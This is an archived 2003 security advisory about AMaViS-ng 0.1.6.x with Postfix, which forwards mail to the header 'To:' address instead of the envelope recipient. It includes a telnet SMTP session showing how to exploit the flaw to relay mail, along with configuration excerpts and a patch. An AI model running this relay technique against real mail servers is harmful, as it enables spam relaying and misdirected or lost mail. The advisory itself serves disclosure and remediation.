TUCoPS :: Unix :: General :: a6124.htm

TUCoPS :: Unix :: General :: a6124.htm
AMaViS-ng possible open relay and mail loss
9th Apr 2003 [SBWID-6124]
COMMAND
	AMaViS-ng possible open relay and mail loss
SYSTEMS AFFECTED
	AMaViS-ng 0.1.6.x
PROBLEM
	Phil Cyc found following, here with potfix, but not specific to:
	
	with postfix using AMaViS-ng 0.1.6.x (tested: 0.1.6.2 and 0.1.6.3;
	0.1.4.x is not vulnerable), all email gets forwarded to the address
	specified by the "To:" header line, ignoring the real recipient given
	via "RCPT TO:".
	
	Possible exploit:
	
	
	--%snip%--
	#> telnet somemx.domain.tld 25
	(220 somemx.domain.tld ESMTP Postfix)
	helo amavis-ng
	(250 somemx.domain.tld)
	mail from:userX@domainX.tld
	(250 ok)
	rcpt to:userY@domain.tld
	(250 ok)
	data
	(354 End data with <CR><LF>.<CR><LF>)
	From: userX@domainX.tld
	To: userZ@domainZ.tld
	Subject: AMaViS-ng 0.1.6.x bug
	.
	(250 Ok: queued as ...)
	quit
	(221 Bye)
	--%snip%--
	
	
	
	Requirements ============
	
	The mx (somemx.domain.tld) having postfix and AMaViS-ng 0.1.6.x
	installed must accept emails for userY@domain.tld.
	
	 What does it do
	 ===============
	
	userX@domainX.tld is sending an email to userY@domain.tld. The header
	of this email contains "To: userZ@domain.tld". AMaViS-ng seems to parse
	the header and forwards the email to userZ@domain.tld. userY@domain.tld
	does not get this email. As many postfix users trust their localhost
	(no restrictions for localhost), it is possible to relay an email or a
	spam mail this way.
	
	 configuration files (relevant parts):
	 =====================================
	
	
	# $postfix/master.cf
	smtp inet n - n - - smtpd -o content_filter filter:
	filter unix - n n - - pipe
	 flags Rq user mail argv /usr/bin/amavis ${sender} -- ${recipient}
	# end of master.cf
	
	# $amavis-ng/amavis.conf
	[global]
	mail-transfer-agent Postfix
	
	[Postfix]
	postfix /usr/sbin/sendmail
	args -i -f
	# end of amavis.conf
	
	
SOLUTION
	
	Update 10 apr. ===============
	
	Phil Cyc proposed following patch, as soft maintainer did not release
	any patch.
	
	
	diff -Nru amavis-ng-0.1.6.3.orig/AMAVIS/MTA/Postfix.pm amavis-ng-0.1.6.3.postfix/AMAVIS/MTA/Postfix.pm
	--- amavis-ng-0.1.6.3.orig/AMAVIS/MTA/Postfix.pm	Tue Mar 18 00:04:21 2003
	+++ amavis-ng-0.1.6.3.postfix/AMAVIS/MTA/Postfix.pm	Tue Apr 8 23:28:09 2003
	@@ -112,22 +112,11 @@
	 
	 writelog($args,LOG_DEBUG, "Called as amavis ".join(' ',@ARGV));
	 
	- while (shift @ARGV) {
	- /^-f$/ && next; # ignore "-f"
	- /^-d$/ && next; # ignore "-d"
	- s/^(.*)$/1ドル/; # untaint sender or recipient
	- if (not defined $$args{'sender'}) {
	- if (/^$/) {
	-	$$args{'sender'} = "<>";
	- }
	- else {
	-	$$args{'sender'} = $_;
	- }
	- }
	- else {
	- push @{$$args{'recipients'}}, $_;
	- }
	- }
	+ shift @ARGV if $ARGV[0] eq "-f";
	+ $$args{'sender'} = shift @ARGV;
	+ $$args{'sender'} = "<>" if (!$$args{'sender'});
	+ shift @ARGV if $ARGV[0] eq "-d";
	+ push @{$$args{'recipients'}}, @ARGV;
	 
	 # Message file has been written, reset file pointer and put it into
	 # the record.